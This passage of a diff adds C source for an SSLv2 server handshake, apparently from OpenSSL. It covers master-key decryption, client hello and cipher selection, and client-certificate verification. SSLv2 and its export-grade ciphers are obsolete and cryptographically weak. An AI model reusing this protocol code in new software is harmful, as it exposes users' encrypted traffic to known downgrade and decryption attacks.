+            s->init_num = 0;
+            s->state = SSL2_ST_SERVER_START_ENCRYPTION;
+            BREAK;
+
+        case SSL2_ST_SERVER_START_ENCRYPTION:
+            /*
+             * Ok we how have sent all the stuff needed to start encrypting,
+             * the next packet back will be encrypted.
+             */
+            if (!ssl2_enc_init(s, 0)) {
+                ret = -1;
+                goto end;
+            }
+            s->s2->clear_text = 0;
+            s->state = SSL2_ST_SEND_SERVER_VERIFY_A;
+            BREAK;
+
+        case SSL2_ST_SEND_SERVER_VERIFY_A:
+        case SSL2_ST_SEND_SERVER_VERIFY_B:
+            ret = server_verify(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            if (s->hit) {
+                /*
+                 * If we are in here, we have been buffering the output, so
+                 * we need to flush it and remove buffering from future
+                 * traffic
+                 */
+                s->state = SSL2_ST_SEND_SERVER_VERIFY_C;
+                BREAK;
+            } else {
+                s->state = SSL2_ST_GET_CLIENT_FINISHED_A;
+                break;
+            }
+
+        case SSL2_ST_SEND_SERVER_VERIFY_C:
+            /* get the number of bytes to write */
+            num1 = BIO_ctrl(s->wbio, BIO_CTRL_INFO, 0, NULL);
+            if (num1 > 0) {
+                s->rwstate = SSL_WRITING;
+                num1 = BIO_flush(s->wbio);
+                if (num1 <= 0) {
+                    ret = -1;
+                    goto end;
+                }
+                s->rwstate = SSL_NOTHING;
+            }
+
+            /* flushed and now remove buffering */
+            s->wbio = BIO_pop(s->wbio);
+
+            s->state = SSL2_ST_GET_CLIENT_FINISHED_A;
+            BREAK;
+
+        case SSL2_ST_GET_CLIENT_FINISHED_A:
+        case SSL2_ST_GET_CLIENT_FINISHED_B:
+            ret = get_client_finished(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL2_ST_SEND_REQUEST_CERTIFICATE_A;
+            BREAK;
+
+        case SSL2_ST_SEND_REQUEST_CERTIFICATE_A:
+        case SSL2_ST_SEND_REQUEST_CERTIFICATE_B:
+        case SSL2_ST_SEND_REQUEST_CERTIFICATE_C:
+        case SSL2_ST_SEND_REQUEST_CERTIFICATE_D:
+            /*
+             * don't do a 'request certificate' if we don't want to, or we
+             * already have one, and we only want to do it once.
+             */
+            if (!(s->verify_mode & SSL_VERIFY_PEER) ||
+                ((s->session->peer != NULL) &&
+                 (s->verify_mode & SSL_VERIFY_CLIENT_ONCE))) {
+                s->state = SSL2_ST_SEND_SERVER_FINISHED_A;
+                break;
+            } else {
+                ret = request_certificate(s);
+                if (ret <= 0)
+                    goto end;
+                s->init_num = 0;
+                s->state = SSL2_ST_SEND_SERVER_FINISHED_A;
+            }
+            BREAK;
+
+        case SSL2_ST_SEND_SERVER_FINISHED_A:
+        case SSL2_ST_SEND_SERVER_FINISHED_B:
+            ret = server_finish(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL_ST_OK;
+            break;
+
+        case SSL_ST_OK:
+            BUF_MEM_free(s->init_buf);
+            ssl_free_wbio_buffer(s);
+            s->init_buf = NULL;
+            s->init_num = 0;
+            /*      ERR_clear_error(); */
+
+            ssl_update_cache(s, SSL_SESS_CACHE_SERVER);
+
+            s->ctx->stats.sess_accept_good++;
+            /* s->server=1; */
+            ret = 1;
+
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_DONE, 1);
+
+            goto end;
+            /* BREAK; */
+
+        default:
+            SSLerr(SSL_F_SSL2_ACCEPT, SSL_R_UNKNOWN_STATE);
+            ret = -1;
+            goto end;
+            /* BREAK; */
+        }
+
+        if ((cb != NULL) && (s->state != state)) {
+            new_state = s->state;
+            s->state = state;
+            cb(s, SSL_CB_ACCEPT_LOOP, 1);
+            s->state = new_state;
+        }
+    }
+ end:
+    s->in_handshake--;
+    if (cb != NULL)
+        cb(s, SSL_CB_ACCEPT_EXIT, ret);
+    return (ret);
+}
+
+static int get_client_master_key(SSL *s)
+{
+    int is_export, i, n, keya, ek;
+    unsigned long len;
+    unsigned char *p;
+    const SSL_CIPHER *cp;
+    const EVP_CIPHER *c;
+    const EVP_MD *md;
+
+    p = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL2_ST_GET_CLIENT_MASTER_KEY_A) {
+        i = ssl2_read(s, (char *)&(p[s->init_num]), 10 - s->init_num);
+
+        if (i < (10 - s->init_num))
+            return (ssl2_part_read(s, SSL_F_GET_CLIENT_MASTER_KEY, i));
+        s->init_num = 10;
+
+        if (*(p++) != SSL2_MT_CLIENT_MASTER_KEY) {
+            if (p[-1] != SSL2_MT_ERROR) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                SSLerr(SSL_F_GET_CLIENT_MASTER_KEY,
+                       SSL_R_READ_WRONG_PACKET_TYPE);
+            } else
+                SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, SSL_R_PEER_ERROR);
+            return (-1);
+        }
+
+        cp = ssl2_get_cipher_by_char(p);
+        if (cp == NULL) {
+            ssl2_return_error(s, SSL2_PE_NO_CIPHER);
+            SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, SSL_R_NO_CIPHER_MATCH);
+            return (-1);
+        }
+        s->session->cipher = cp;
+
+        p += 3;
+        n2s(p, i);
+        s->s2->tmp.clear = i;
+        n2s(p, i);
+        s->s2->tmp.enc = i;
+        n2s(p, i);
+        if (i > SSL_MAX_KEY_ARG_LENGTH) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, SSL_R_KEY_ARG_TOO_LONG);
+            return -1;
+        }
+        s->session->key_arg_length = i;
+        s->state = SSL2_ST_GET_CLIENT_MASTER_KEY_B;
+    }
+
+    /* SSL2_ST_GET_CLIENT_MASTER_KEY_B */
+    p = (unsigned char *)s->init_buf->data;
+    if (s->init_buf->length < SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, ERR_R_INTERNAL_ERROR);
+        return -1;
+    }
+    keya = s->session->key_arg_length;
+    len =
+        10 + (unsigned long)s->s2->tmp.clear + (unsigned long)s->s2->tmp.enc +
+        (unsigned long)keya;
+    if (len > SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, SSL_R_MESSAGE_TOO_LONG);
+        return -1;
+    }
+    n = (int)len - s->init_num;
+    i = ssl2_read(s, (char *)&(p[s->init_num]), n);
+    if (i != n)
+        return (ssl2_part_read(s, SSL_F_GET_CLIENT_MASTER_KEY, i));
+    if (s->msg_callback) {
+        /* CLIENT-MASTER-KEY */
+        s->msg_callback(0, s->version, 0, p, (size_t)len, s,
+                        s->msg_callback_arg);
+    }
+    p += 10;
+
+    memcpy(s->session->key_arg, &(p[s->s2->tmp.clear + s->s2->tmp.enc]),
+           (unsigned int)keya);
+
+    if (s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, SSL_R_NO_PRIVATEKEY);
+        return (-1);
+    }
+    i = ssl_rsa_private_decrypt(s->cert, s->s2->tmp.enc,
+                                &(p[s->s2->tmp.clear]),
+                                &(p[s->s2->tmp.clear]),
+                                (s->s2->ssl2_rollback) ? RSA_SSLV23_PADDING :
+                                RSA_PKCS1_PADDING);
+
+    is_export = SSL_C_IS_EXPORT(s->session->cipher);
+
+    if (!ssl_cipher_get_evp(s->session, &c, &md, NULL, NULL, NULL)) {
+        ssl2_return_error(s, SSL2_PE_NO_CIPHER);
+        SSLerr(SSL_F_GET_CLIENT_MASTER_KEY,
+               SSL_R_PROBLEMS_MAPPING_CIPHER_FUNCTIONS);
+        return (0);
+    }
+
+    if (s->session->cipher->algorithm2 & SSL2_CF_8_BYTE_ENC) {
+        is_export = 1;
+        ek = 8;
+    } else
+        ek = 5;
+
+    /* bad decrypt */
+# if 1
+    /*
+     * If a bad decrypt, continue with protocol but with a random master
+     * secret (Bleichenbacher attack)
+     */
+    if ((i < 0) || ((!is_export && (i != EVP_CIPHER_key_length(c)))
+                    || (is_export && ((i != ek)
+                                      || (s->s2->tmp.clear +
+                                          (unsigned int)i != (unsigned int)
+                                          EVP_CIPHER_key_length(c)))))) {
+        ERR_clear_error();
+        if (is_export)
+            i = ek;
+        else
+            i = EVP_CIPHER_key_length(c);
+        if (RAND_pseudo_bytes(p, i) <= 0)
+            return 0;
+    }
+# else
+    if (i < 0) {
+        error = 1;
+        SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, SSL_R_BAD_RSA_DECRYPT);
+    }
+    /* incorrect number of key bytes for non export cipher */
+    else if ((!is_export && (i != EVP_CIPHER_key_length(c)))
+             || (is_export && ((i != ek) || (s->s2->tmp.clear + i !=
+                                             EVP_CIPHER_key_length(c))))) {
+        error = 1;
+        SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, SSL_R_WRONG_NUMBER_OF_KEY_BITS);
+    }
+    if (error) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        return (-1);
+    }
+# endif
+
+    if (is_export)
+        i += s->s2->tmp.clear;
+
+    if (i > SSL_MAX_MASTER_KEY_LENGTH) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_MASTER_KEY, ERR_R_INTERNAL_ERROR);
+        return -1;
+    }
+    s->session->master_key_length = i;
+    memcpy(s->session->master_key, p, (unsigned int)i);
+    return (1);
+}
+
+static int get_client_hello(SSL *s)
+{
+    int i, n;
+    unsigned long len;
+    unsigned char *p;
+    STACK_OF(SSL_CIPHER) *cs;   /* a stack of SSL_CIPHERS */
+    STACK_OF(SSL_CIPHER) *cl;   /* the ones we want to use */
+    STACK_OF(SSL_CIPHER) *prio, *allow;
+    int z;
+
+    /*
+     * This is a bit of a hack to check for the correct packet type the first
+     * time round.
+     */
+    if (s->state == SSL2_ST_GET_CLIENT_HELLO_A) {
+        s->first_packet = 1;
+        s->state = SSL2_ST_GET_CLIENT_HELLO_B;
+    }
+
+    p = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL2_ST_GET_CLIENT_HELLO_B) {
+        i = ssl2_read(s, (char *)&(p[s->init_num]), 9 - s->init_num);
+        if (i < (9 - s->init_num))
+            return (ssl2_part_read(s, SSL_F_GET_CLIENT_HELLO, i));
+        s->init_num = 9;
+
+        if (*(p++) != SSL2_MT_CLIENT_HELLO) {
+            if (p[-1] != SSL2_MT_ERROR) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                SSLerr(SSL_F_GET_CLIENT_HELLO, SSL_R_READ_WRONG_PACKET_TYPE);
+            } else
+                SSLerr(SSL_F_GET_CLIENT_HELLO, SSL_R_PEER_ERROR);
+            return (-1);
+        }
+        n2s(p, i);
+        if (i < s->version)
+            s->version = i;
+        n2s(p, i);
+        s->s2->tmp.cipher_spec_length = i;
+        n2s(p, i);
+        s->s2->tmp.session_id_length = i;
+        n2s(p, i);
+        s->s2->challenge_length = i;
+        if ((i < SSL2_MIN_CHALLENGE_LENGTH) ||
+            (i > SSL2_MAX_CHALLENGE_LENGTH)) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_GET_CLIENT_HELLO, SSL_R_INVALID_CHALLENGE_LENGTH);
+            return (-1);
+        }
+        s->state = SSL2_ST_GET_CLIENT_HELLO_C;
+    }
+
+    /* SSL2_ST_GET_CLIENT_HELLO_C */
+    p = (unsigned char *)s->init_buf->data;
+    len =
+        9 + (unsigned long)s->s2->tmp.cipher_spec_length +
+        (unsigned long)s->s2->challenge_length +
+        (unsigned long)s->s2->tmp.session_id_length;
+    if (len > SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_HELLO, SSL_R_MESSAGE_TOO_LONG);
+        return -1;
+    }
+    n = (int)len - s->init_num;
+    i = ssl2_read(s, (char *)&(p[s->init_num]), n);
+    if (i != n)
+        return (ssl2_part_read(s, SSL_F_GET_CLIENT_HELLO, i));
+    if (s->msg_callback) {
+        /* CLIENT-HELLO */
+        s->msg_callback(0, s->version, 0, p, (size_t)len, s,
+                        s->msg_callback_arg);
+    }
+    p += 9;
+
+    /*
+     * get session-id before cipher stuff so we can get out session structure
+     * if it is cached
+     */
+    /* session-id */
+    if ((s->s2->tmp.session_id_length != 0) &&
+        (s->s2->tmp.session_id_length != SSL2_SSL_SESSION_ID_LENGTH)) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_HELLO, SSL_R_BAD_SSL_SESSION_ID_LENGTH);
+        return (-1);
+    }
+
+    if (s->s2->tmp.session_id_length == 0) {
+        if (!ssl_get_new_session(s, 1)) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            return (-1);
+        }
+    } else {
+        i = ssl_get_prev_session(s, &(p[s->s2->tmp.cipher_spec_length]),
+                                 s->s2->tmp.session_id_length, NULL);
+        if (i == 1) {           /* previous session */
+            s->hit = 1;
+        } else if (i == -1) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            return (-1);
+        } else {
+            if (s->cert == NULL) {
+                ssl2_return_error(s, SSL2_PE_NO_CERTIFICATE);
+                SSLerr(SSL_F_GET_CLIENT_HELLO, SSL_R_NO_CERTIFICATE_SET);
+                return (-1);
+            }
+
+            if (!ssl_get_new_session(s, 1)) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                return (-1);
+            }
+        }
+    }
+
+    if (!s->hit) {
+        cs = ssl_bytes_to_cipher_list(s, p, s->s2->tmp.cipher_spec_length,
+                                      &s->session->ciphers);
+        if (cs == NULL)
+            goto mem_err;
+
+        cl = SSL_get_ciphers(s);
+
+        if (s->options & SSL_OP_CIPHER_SERVER_PREFERENCE) {
+            prio = sk_SSL_CIPHER_dup(cl);
+            if (prio == NULL)
+                goto mem_err;
+            allow = cs;
+        } else {
+            prio = cs;
+            allow = cl;
+        }
+        for (z = 0; z < sk_SSL_CIPHER_num(prio); z++) {
+            if (sk_SSL_CIPHER_find(allow, sk_SSL_CIPHER_value(prio, z)) < 0) {
+                (void)sk_SSL_CIPHER_delete(prio, z);
+                z--;
+            }
+        }
+        if (s->options & SSL_OP_CIPHER_SERVER_PREFERENCE) {
+            sk_SSL_CIPHER_free(s->session->ciphers);
+            s->session->ciphers = prio;
+        }
+        /*
+         * s->session->ciphers should now have a list of ciphers that are on
+         * both the client and server. This list is ordered by the order the
+         * client sent the ciphers or in the order of the server's preference
+         * if SSL_OP_CIPHER_SERVER_PREFERENCE was set.
+         */
+    }
+    p += s->s2->tmp.cipher_spec_length;
+    /* done cipher selection */
+
+    /* session id extracted already */
+    p += s->s2->tmp.session_id_length;
+
+    /* challenge */
+    if (s->s2->challenge_length > sizeof s->s2->challenge) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
+        return -1;
+    }
+    memcpy(s->s2->challenge, p, (unsigned int)s->s2->challenge_length);
+    return (1);
+ mem_err:
+    SSLerr(SSL_F_GET_CLIENT_HELLO, ERR_R_MALLOC_FAILURE);
+    return (0);
+}
+
+static int server_hello(SSL *s)
+{
+    unsigned char *p, *d;
+    int n, hit;
+
+    p = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL2_ST_SEND_SERVER_HELLO_A) {
+        d = p + 11;
+        *(p++) = SSL2_MT_SERVER_HELLO; /* type */
+        hit = s->hit;
+        *(p++) = (unsigned char)hit;
+# if 1
+        if (!hit) {
+            if (s->session->sess_cert != NULL)
+                /*
+                 * This can't really happen because get_client_hello has
+                 * called ssl_get_new_session, which does not set sess_cert.
+                 */
+                ssl_sess_cert_free(s->session->sess_cert);
+            s->session->sess_cert = ssl_sess_cert_new();
+            if (s->session->sess_cert == NULL) {
+                SSLerr(SSL_F_SERVER_HELLO, ERR_R_MALLOC_FAILURE);
+                return (-1);
+            }
+        }
+        /*
+         * If 'hit' is set, then s->sess_cert may be non-NULL or NULL,
+         * depending on whether it survived in the internal cache or was
+         * retrieved from an external cache. If it is NULL, we cannot put any
+         * useful data in it anyway, so we don't touch it.
+         */
+
+# else                          /* That's what used to be done when cert_st
+                                 * and sess_cert_st were * the same. */
+        if (!hit) {             /* else add cert to session */
+            CRYPTO_add(&s->cert->references, 1, CRYPTO_LOCK_SSL_CERT);
+            if (s->session->sess_cert != NULL)
+                ssl_cert_free(s->session->sess_cert);
+            s->session->sess_cert = s->cert;
+        } else {                /* We have a session id-cache hit, if the *
+                                 * session-id has no certificate listed
+                                 * against * the 'cert' structure, grab the
+                                 * 'old' one * listed against the SSL
+                                 * connection */
+            if (s->session->sess_cert == NULL) {
+                CRYPTO_add(&s->cert->references, 1, CRYPTO_LOCK_SSL_CERT);
+                s->session->sess_cert = s->cert;
+            }
+        }
+# endif
+
+        if (s->cert == NULL) {
+            ssl2_return_error(s, SSL2_PE_NO_CERTIFICATE);
+            SSLerr(SSL_F_SERVER_HELLO, SSL_R_NO_CERTIFICATE_SPECIFIED);
+            return (-1);
+        }
+
+        if (hit) {
+            *(p++) = 0;         /* no certificate type */
+            s2n(s->version, p); /* version */
+            s2n(0, p);          /* cert len */
+            s2n(0, p);          /* ciphers len */
+        } else {
+            /* EAY EAY */
+            /* put certificate type */
+            *(p++) = SSL2_CT_X509_CERTIFICATE;
+            s2n(s->version, p); /* version */
+            n = i2d_X509(s->cert->pkeys[SSL_PKEY_RSA_ENC].x509, NULL);
+            s2n(n, p);          /* certificate length */
+            i2d_X509(s->cert->pkeys[SSL_PKEY_RSA_ENC].x509, &d);
+            n = 0;
+
+            /*
+             * lets send out the ciphers we like in the prefered order
+             */
+            n = ssl_cipher_list_to_bytes(s, s->session->ciphers, d, 0);
+            d += n;
+            s2n(n, p);          /* add cipher length */
+        }
+
+        /* make and send conn_id */
+        s2n(SSL2_CONNECTION_ID_LENGTH, p); /* add conn_id length */
+        s->s2->conn_id_length = SSL2_CONNECTION_ID_LENGTH;
+        if (RAND_pseudo_bytes(s->s2->conn_id, (int)s->s2->conn_id_length) <=
+            0)
+            return -1;
+        memcpy(d, s->s2->conn_id, SSL2_CONNECTION_ID_LENGTH);
+        d += SSL2_CONNECTION_ID_LENGTH;
+
+        s->state = SSL2_ST_SEND_SERVER_HELLO_B;
+        s->init_num = d - (unsigned char *)s->init_buf->data;
+        s->init_off = 0;
+    }
+    /* SSL2_ST_SEND_SERVER_HELLO_B */
+    /*
+     * If we are using TCP/IP, the performance is bad if we do 2 writes
+     * without a read between them.  This occurs when Session-id reuse is
+     * used, so I will put in a buffering module
+     */
+    if (s->hit) {
+        if (!ssl_init_wbio_buffer(s, 1))
+            return (-1);
+    }
+
+    return (ssl2_do_write(s));
+}
+
+static int get_client_finished(SSL *s)
+{
+    unsigned char *p;
+    int i, n;
+    unsigned long len;
+
+    p = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL2_ST_GET_CLIENT_FINISHED_A) {
+        i = ssl2_read(s, (char *)&(p[s->init_num]), 1 - s->init_num);
+        if (i < 1 - s->init_num)
+            return (ssl2_part_read(s, SSL_F_GET_CLIENT_FINISHED, i));
+        s->init_num += i;
+
+        if (*p != SSL2_MT_CLIENT_FINISHED) {
+            if (*p != SSL2_MT_ERROR) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                SSLerr(SSL_F_GET_CLIENT_FINISHED,
+                       SSL_R_READ_WRONG_PACKET_TYPE);
+            } else {
+                SSLerr(SSL_F_GET_CLIENT_FINISHED, SSL_R_PEER_ERROR);
+                /* try to read the error message */
+                i = ssl2_read(s, (char *)&(p[s->init_num]), 3 - s->init_num);
+                return ssl2_part_read(s, SSL_F_GET_SERVER_VERIFY, i);
+            }
+            return (-1);
+        }
+        s->state = SSL2_ST_GET_CLIENT_FINISHED_B;
+    }
+
+    /* SSL2_ST_GET_CLIENT_FINISHED_B */
+    if (s->s2->conn_id_length > sizeof s->s2->conn_id) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_FINISHED, ERR_R_INTERNAL_ERROR);
+        return -1;
+    }
+    len = 1 + (unsigned long)s->s2->conn_id_length;
+    n = (int)len - s->init_num;
+    i = ssl2_read(s, (char *)&(p[s->init_num]), n);
+    if (i < n) {
+        return (ssl2_part_read(s, SSL_F_GET_CLIENT_FINISHED, i));
+    }
+    if (s->msg_callback) {
+        /* CLIENT-FINISHED */
+        s->msg_callback(0, s->version, 0, p, len, s, s->msg_callback_arg);
+    }
+    p += 1;
+    if (memcmp(p, s->s2->conn_id, s->s2->conn_id_length) != 0) {
+        ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+        SSLerr(SSL_F_GET_CLIENT_FINISHED, SSL_R_CONNECTION_ID_IS_DIFFERENT);
+        return (-1);
+    }
+    return (1);
+}
+
+static int server_verify(SSL *s)
+{
+    unsigned char *p;
+
+    if (s->state == SSL2_ST_SEND_SERVER_VERIFY_A) {
+        p = (unsigned char *)s->init_buf->data;
+        *(p++) = SSL2_MT_SERVER_VERIFY;
+        if (s->s2->challenge_length > sizeof s->s2->challenge) {
+            SSLerr(SSL_F_SERVER_VERIFY, ERR_R_INTERNAL_ERROR);
+            return -1;
+        }
+        memcpy(p, s->s2->challenge, (unsigned int)s->s2->challenge_length);
+        /* p+=s->s2->challenge_length; */
+
+        s->state = SSL2_ST_SEND_SERVER_VERIFY_B;
+        s->init_num = s->s2->challenge_length + 1;
+        s->init_off = 0;
+    }
+    return (ssl2_do_write(s));
+}
+
+static int server_finish(SSL *s)
+{
+    unsigned char *p;
+
+    if (s->state == SSL2_ST_SEND_SERVER_FINISHED_A) {
+        p = (unsigned char *)s->init_buf->data;
+        *(p++) = SSL2_MT_SERVER_FINISHED;
+
+        if (s->session->session_id_length > sizeof s->session->session_id) {
+            SSLerr(SSL_F_SERVER_FINISH, ERR_R_INTERNAL_ERROR);
+            return -1;
+        }
+        memcpy(p, s->session->session_id,
+               (unsigned int)s->session->session_id_length);
+        /* p+=s->session->session_id_length; */
+
+        s->state = SSL2_ST_SEND_SERVER_FINISHED_B;
+        s->init_num = s->session->session_id_length + 1;
+        s->init_off = 0;
+    }
+
+    /* SSL2_ST_SEND_SERVER_FINISHED_B */
+    return (ssl2_do_write(s));
+}
+
+/* send the request and check the response */
+static int request_certificate(SSL *s)
+{
+    const unsigned char *cp;
+    unsigned char *p, *p2, *buf2;
+    unsigned char *ccd;
+    int i, j, ctype, ret = -1;
+    unsigned long len;
+    X509 *x509 = NULL;
+    STACK_OF(X509) *sk = NULL;
+
+    ccd = s->s2->tmp.ccl;
+    if (s->state == SSL2_ST_SEND_REQUEST_CERTIFICATE_A) {
+        p = (unsigned char *)s->init_buf->data;
+        *(p++) = SSL2_MT_REQUEST_CERTIFICATE;
+        *(p++) = SSL2_AT_MD5_WITH_RSA_ENCRYPTION;
+        if (RAND_pseudo_bytes(ccd, SSL2_MIN_CERT_CHALLENGE_LENGTH) <= 0)
+            return -1;
+        memcpy(p, ccd, SSL2_MIN_CERT_CHALLENGE_LENGTH);
+
+        s->state = SSL2_ST_SEND_REQUEST_CERTIFICATE_B;
+        s->init_num = SSL2_MIN_CERT_CHALLENGE_LENGTH + 2;
+        s->init_off = 0;
+    }
+
+    if (s->state == SSL2_ST_SEND_REQUEST_CERTIFICATE_B) {
+        i = ssl2_do_write(s);
+        if (i <= 0) {
+            ret = i;
+            goto end;
+        }
+
+        s->init_num = 0;
+        s->state = SSL2_ST_SEND_REQUEST_CERTIFICATE_C;
+    }
+
+    if (s->state == SSL2_ST_SEND_REQUEST_CERTIFICATE_C) {
+        p = (unsigned char *)s->init_buf->data;
+        /* try to read 6 octets ... */
+        i = ssl2_read(s, (char *)&(p[s->init_num]), 6 - s->init_num);
+        /*
+         * ... but don't call ssl2_part_read now if we got at least 3
+         * (probably NO-CERTIFICATE-ERROR)
+         */
+        if (i < 3 - s->init_num) {
+            ret = ssl2_part_read(s, SSL_F_REQUEST_CERTIFICATE, i);
+            goto end;
+        }
+        s->init_num += i;
+
+        if ((s->init_num >= 3) && (p[0] == SSL2_MT_ERROR)) {
+            n2s(p, i);
+            if (i != SSL2_PE_NO_CERTIFICATE) {
+                /*
+                 * not the error message we expected -- let ssl2_part_read
+                 * handle it
+                 */
+                s->init_num -= 3;
+                ret = ssl2_part_read(s, SSL_F_REQUEST_CERTIFICATE, 3);
+                goto end;
+            }
+
+            if (s->msg_callback) {
+                /* ERROR */
+                s->msg_callback(0, s->version, 0, p, 3, s,
+                                s->msg_callback_arg);
+            }
+
+            /*
+             * this is the one place where we can recover from an SSL 2.0
+             * error
+             */
+
+            if (s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT) {
+                ssl2_return_error(s, SSL2_PE_BAD_CERTIFICATE);
+                SSLerr(SSL_F_REQUEST_CERTIFICATE,
+                       SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
+                goto end;
+            }
+            ret = 1;
+            goto end;
+        }
+        if ((*(p++) != SSL2_MT_CLIENT_CERTIFICATE) || (s->init_num < 6)) {
+            ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+            SSLerr(SSL_F_REQUEST_CERTIFICATE, SSL_R_SHORT_READ);
+            goto end;
+        }
+        if (s->init_num != 6) {
+            SSLerr(SSL_F_REQUEST_CERTIFICATE, ERR_R_INTERNAL_ERROR);
+            goto end;
+        }
+
+        /* ok we have a response */
+        /* certificate type, there is only one right now. */
+        ctype = *(p++);
+        if (ctype != SSL2_AT_MD5_WITH_RSA_ENCRYPTION) {
+            ssl2_return_error(s, SSL2_PE_UNSUPPORTED_CERTIFICATE_TYPE);
+            SSLerr(SSL_F_REQUEST_CERTIFICATE, SSL_R_BAD_RESPONSE_ARGUMENT);
+            goto end;
+        }
+        n2s(p, i);
+        s->s2->tmp.clen = i;
+        n2s(p, i);
+        s->s2->tmp.rlen = i;
+        s->state = SSL2_ST_SEND_REQUEST_CERTIFICATE_D;
+    }
+
+    /* SSL2_ST_SEND_REQUEST_CERTIFICATE_D */
+    p = (unsigned char *)s->init_buf->data;
+    len = 6 + (unsigned long)s->s2->tmp.clen + (unsigned long)s->s2->tmp.rlen;
+    if (len > SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER) {
+        SSLerr(SSL_F_REQUEST_CERTIFICATE, SSL_R_MESSAGE_TOO_LONG);
+        goto end;
+    }
+    j = (int)len - s->init_num;
+    i = ssl2_read(s, (char *)&(p[s->init_num]), j);
+    if (i < j) {
+        ret = ssl2_part_read(s, SSL_F_REQUEST_CERTIFICATE, i);
+        goto end;
+    }
+    if (s->msg_callback) {
+        /* CLIENT-CERTIFICATE */
+        s->msg_callback(0, s->version, 0, p, len, s, s->msg_callback_arg);
+    }
+    p += 6;
+
+    cp = p;
+    x509 = (X509 *)d2i_X509(NULL, &cp, (long)s->s2->tmp.clen);
+    if (x509 == NULL) {
+        SSLerr(SSL_F_REQUEST_CERTIFICATE, ERR_R_X509_LIB);
+        goto msg_end;
+    }
+
+    if (((sk = sk_X509_new_null()) == NULL) || (!sk_X509_push(sk, x509))) {
+        SSLerr(SSL_F_REQUEST_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+        goto msg_end;
+    }
+
+    i = ssl_verify_cert_chain(s, sk);
+
+    if (i > 0) {                /* we like the packet, now check the chksum */
+        EVP_MD_CTX ctx;
+        EVP_PKEY *pkey = NULL;
+
+        EVP_MD_CTX_init(&ctx);
+        if (!EVP_VerifyInit_ex(&ctx, s->ctx->rsa_md5, NULL)
+            || !EVP_VerifyUpdate(&ctx, s->s2->key_material,
+                                 s->s2->key_material_length)
+            || !EVP_VerifyUpdate(&ctx, ccd, SSL2_MIN_CERT_CHALLENGE_LENGTH))
+            goto msg_end;
+
+        i = i2d_X509(s->cert->pkeys[SSL_PKEY_RSA_ENC].x509, NULL);
+        buf2 = OPENSSL_malloc((unsigned int)i);
+        if (buf2 == NULL) {
+            SSLerr(SSL_F_REQUEST_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+            goto msg_end;
+        }
+        p2 = buf2;
+        i = i2d_X509(s->cert->pkeys[SSL_PKEY_RSA_ENC].x509, &p2);
+        if (!EVP_VerifyUpdate(&ctx, buf2, (unsigned int)i)) {
+            OPENSSL_free(buf2);
+            goto msg_end;
+        }
+        OPENSSL_free(buf2);
+
+        pkey = X509_get_pubkey(x509);
+        if (pkey == NULL)
+            goto end;
+        i = EVP_VerifyFinal(&ctx, cp, s->s2->tmp.rlen, pkey);
+        EVP_PKEY_free(pkey);
+        EVP_MD_CTX_cleanup(&ctx);
+
+        if (i > 0) {
+            if (s->session->peer != NULL)
+                X509_free(s->session->peer);
+            s->session->peer = x509;
+            CRYPTO_add(&x509->references, 1, CRYPTO_LOCK_X509);
+            s->session->verify_result = s->verify_result;
+            ret = 1;
+            goto end;
+        } else {
+            SSLerr(SSL_F_REQUEST_CERTIFICATE, SSL_R_BAD_CHECKSUM);
+            goto msg_end;
+        }
+    } else {
+ msg_end:
+        ssl2_return_error(s, SSL2_PE_BAD_CERTIFICATE);
+    }
+ end:
+    sk_X509_free(sk);
+    X509_free(x509);
+    return (ret);
+}
+
+static int ssl_rsa_private_decrypt(CERT *c, int len, unsigned char *from,
